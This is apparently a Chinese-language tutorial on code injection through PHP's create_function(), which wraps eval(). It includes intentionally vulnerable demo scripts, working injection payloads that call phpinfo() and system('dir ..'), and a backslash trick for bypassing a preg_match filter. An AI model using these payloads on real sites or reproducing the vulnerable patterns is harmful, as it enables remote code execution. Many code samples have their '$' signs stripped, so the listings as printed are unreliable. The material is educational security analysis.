create_function()函数
官方文档介绍
示例代码:
<?php
newfunc = create_function('a,b', 'return "ln(a) + ln(b) =". log(a * b);');
echo "New anonymous function:newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
//注:lambda_1函数名随着执行次数增加会逐个增大
?>
分析
create_function()会创建一个匿名函数(lambda样式)。此处创建了一个叫lambda_1的函数,在第一个echo中显示出名字,并在第二个echo语句中执行了此函数。
create_function()函数会在内部执行 eval(),我们发现是执行了后面的return语句,属于create_function()中的第二个参数string $code位置。
相当于重写了一段代码:
<?php
function lambda_1(a,b){
return "ln(a) + ln(b) = " . log(a *b);
}
?>
usort()函数
官方文档:
demo1.php:
<?php
error_reporting(0);
sort_by =_GET['sort_by'];
sorter = 'strnatcasecmp';databases=array('1234','4321');
sort_function =\'return 1 *\'.sorter . '(a["' .sort_by . '"], b["' .sort_by . '"]);';
usort(databases, create_function('a, b',sort_function));
?>
payload:?sort_by=%27%22]);}phpinfo();/*
匿名函数实际的执行:
function niming(a,b){
return 1 * ' . sorter . '(a["' . $sort_by '"]);}phpinfo();/*
}
继续分析一个例子:
demo2.php:
<?php
show_source(__FILE__);
act=_REQUEST['act'];
arg=_REQUEST['arg'];
if(preg_match('/^[a-z0-9_]*/isD',act)){
echo 'hacker';
}
else{
act(arg,'');
}
echo '666';
?>
代码分析:preg_match过滤要求$act参数不能只有数字字母和下划线
绕过过滤后动态执行函数,但已经设置了一个参数为空字符”
解决思路:
利用create_function()函数重写函数的特性闭合参数的括号,并用/*注释掉后面的代码
使用反斜杠绕过preg_match()的检测(在函数名前加反斜杠不影响函数执行)
payload:
?act=\create_function&arg=){};system(‘dir ..’);phpinfo();/*
相当于源码变成了:
<?php
show_source(__FILE__);
act=_REQUEST['act'];
arg=_REQUEST['arg'];
if(preg_match('/^[a-z0-9_]*/isD',act)){
echo 'hacker';
}
else{
create_function(){};system('dir ..');phpinfo();/*
}
echo '666';
?>
成功执行代码:
同时注意到一个有意思的地方:
使用usort(array,callback)函数将array传到callback函数进行排列,如果array的数量大于callback的参数的时候,会将满足参数个数的情况下依次右移形成下的组合情况都执行一遍,如callback函数有两个参数,$array有3个变量如a,b,c的时候,将会把ab,bc传参进去分别执行一次
<?php
lambda=create_function('a,b','echo "###a--b###"."\n";');array=array("a","b","c","d");
echo usort(array,lambda);
?>